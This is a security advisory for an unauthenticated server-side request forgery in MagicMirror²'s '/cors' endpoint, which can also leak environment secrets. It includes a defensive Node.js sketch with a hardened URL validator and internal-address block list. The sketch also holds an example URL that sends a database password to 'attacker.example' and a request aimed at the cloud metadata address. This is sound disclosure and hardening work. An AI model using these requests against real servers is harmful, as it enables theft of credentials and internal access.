PT-2026-37258 · Magicmirrororg+2 · Magicmirror

Astaruf · Published 2026-05-05 · Updated 2026-05-14

CVE-2026-42281 · CVSS v4.0 9.2 Critical
Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions: MagicMirror² versions prior to 2.36.0
Description: An unauthenticated Server-Side Request Forgery (SSRF) exists in the '/cors' endpoint, which acts as an open HTTP proxy with neither authentication nor validation of the target URL. A remote attacker can therefore make the server issue arbitrary HTTP requests to services bound to localhost, to cloud instance metadata services, and to hosts on the internal network. The issue is located in the cors() function in js/server_functions.js. Additionally, the replaceSecretPlaceholder() function expands placeholders of the form **VAR_NAME** with the corresponding values from process.env, so an attacker who can reach the endpoint can have server-side secrets such as API keys, tokens, and database credentials substituted into a request that the server then sends to a host under the attacker's control.
Recommendations: Update MagicMirror² to version 2.36.0 or later. As a temporary workaround, restrict access to the '/cors' endpoint until the update is applied, for example by limiting which clients can reach the MagicMirror² web server at all (its address and ipWhitelist settings in config.js, or an access rule on a reverse proxy in front of it). Verify the fix by requesting the endpoint from an unauthorised client with a target such as a loopback or link-local address and confirming that the server refuses to proxy it.
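The following Node.js sketch is an added example and is neither MagicMirror²'s own code nor the upstream fix (whose details this page does not give). It reconstructs in miniature the two behaviours the description names, unvalidated proxy targets and **VAR_NAME** expansion from the environment, and places a hardened target check beside them. The function names, the operator-supplied host allowlist, and the sample environment are assumptions made for illustration; the sample environment and URLs are constructed, not captured.

```javascript
// Added example, not MagicMirror²'s code: the vulnerable pattern the advisory
// describes, reconstructed, beside a hardened proxy-target check.
// Function names, the allowlist shape and all sample data are assumptions.

const PLACEHOLDER = /\*\*([A-Za-z_][A-Za-z0-9_]*)\*\*/g;
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Vulnerable behaviour (illustrative reconstruction): every **VAR_NAME** in the
// requested URL is replaced with env.VAR_NAME, so an unauthenticated caller can
// pull any environment variable into a URL the server then fetches for them.
function expandPlaceholdersUnsafe(rawUrl, env) {
  return rawUrl.replace(PLACEHOLDER, (match, name) => (hasOwn(env, name) ? env[name] : match));
}

// Hardened variant: only variables the operator explicitly listed for the proxy
// (assumed config key) are ever substituted; any other placeholder is left as-is.
function expandPlaceholdersSafe(rawUrl, env, allowedVars) {
  return rawUrl.replace(PLACEHOLDER, (match, name) =>
    allowedVars.has(name) && hasOwn(env, name) ? env[name] : match);
}

function ipv4ToInt(ip) {
  return ip.split(".").reduce((acc, octet) => ((acc << 8) + Number(octet)) >>> 0, 0);
}

// Ranges a proxy reachable by untrusted clients must never be sent to: RFC 1918,
// loopback, link-local (which holds the 169.254.169.254 cloud metadata address),
// CGNAT and "this network".
const BLOCKED_V4 = [
  ["10.0.0.0", 8], ["172.16.0.0", 12], ["192.168.0.0", 16], ["127.0.0.0", 8],
  ["169.254.0.0", 16], ["100.64.0.0", 10], ["0.0.0.0", 8],
];

function isBlockedIPv4(ip) {
  const n = ipv4ToInt(ip);
  return BLOCKED_V4.some(([base, bits]) => {
    const mask = (~0 << (32 - bits)) >>> 0;
    return ((n & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
  });
}

function isBlockedIPv6(ip) {
  const h = ip.toLowerCase();
  if (h === "::1" || h === "::") return true;   // loopback, unspecified
  if (/^f[cd]/.test(h)) return true;            // fc00::/7 unique-local
  if (/^fe[89ab]/.test(h)) return true;         // fe80::/10 link-local
  const mapped = h.match(/^::ffff:(.+)$/);      // IPv4-mapped: ::ffff:a.b.c.d
  if (mapped) {
    let tail = mapped[1];
    if (!tail.includes(".")) {                  // URL parser serialises it as ::ffff:a00:1
      const parts = tail.split(":").map((x) => parseInt(x, 16));
      const lo = parts.pop();
      const hi = parts.pop() || 0;
      tail = [hi >> 8, hi & 255, lo >> 8, lo & 255].join(".");
    }
    return isBlockedIPv4(tail);
  }
  return false;
}

// Hardened target check: scheme pinned to http/https, IP literals screened against
// the blocked ranges, localhost refused, and the host required to be on an
// operator-maintained allowlist. Returns { ok, reason } so the caller can log the
// reason and answer 403 without ever issuing the upstream request.
function validateProxyTarget(rawUrl, allowedHosts) {
  let url;
  try { url = new URL(rawUrl); } catch (e) { return { ok: false, reason: "unparseable URL" }; }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    return { ok: false, reason: `scheme ${url.protocol} not allowed` };
  }
  // WHATWG parsing has already normalised forms such as 0x7f000001, 127.1 and
  // 2130706433 to dotted 127.0.0.1, and always brackets IPv6 literals.
  const host = url.hostname.replace(/^\[|\]$/g, "");
  if (url.hostname.startsWith("[")) {
    if (isBlockedIPv6(host)) return { ok: false, reason: `blocked IPv6 address ${host}` };
  } else if (/^\d+\.\d+\.\d+\.\d+$/.test(host)) {
    if (isBlockedIPv4(host)) return { ok: false, reason: `blocked IPv4 address ${host}` };
  } else if (host === "localhost" || host.endsWith(".localhost")) {
    return { ok: false, reason: "localhost is never a valid proxy target" };
  }
  if (!allowedHosts.has(host.toLowerCase())) {
    return { ok: false, reason: `host ${host} not in allowlist` };
  }
  return { ok: true, reason: "allowed", url: url.href };
}

// Constructed sample data (assumed operator config and a fake environment).
const EXAMPLE_ALLOWLIST = new Set(["api.openweathermap.org"]);
const EXAMPLE_ENV = { API_KEY: "s3cr3t", DB_PASSWORD: "hunter2" };

console.log(expandPlaceholdersUnsafe("https://attacker.example/?k=**DB_PASSWORD**", EXAMPLE_ENV));
console.log(validateProxyTarget("http://169.254.169.254/latest/meta-data/", EXAMPLE_ALLOWLIST));
```

The hostname allowlist is checked before DNS resolution, so an allowed name that resolves to an internal address (or rebinds between check and connect) is not caught by this code alone; pinning the resolved address at connect time and refusing to follow redirects closes those two gaps, since a redirect from an allowed host to a blocked address would otherwise bypass the pre-check entirely.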

Exploit · Fix · SSRF

Related Identifiers

CVE-2026-42281
GHSA-PH6F-2CVQ-79HQ

Affected Products

Magicmirror